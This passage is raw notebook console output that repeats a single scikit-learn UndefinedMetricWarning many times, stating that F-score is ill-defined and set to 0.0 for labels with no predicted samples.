predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
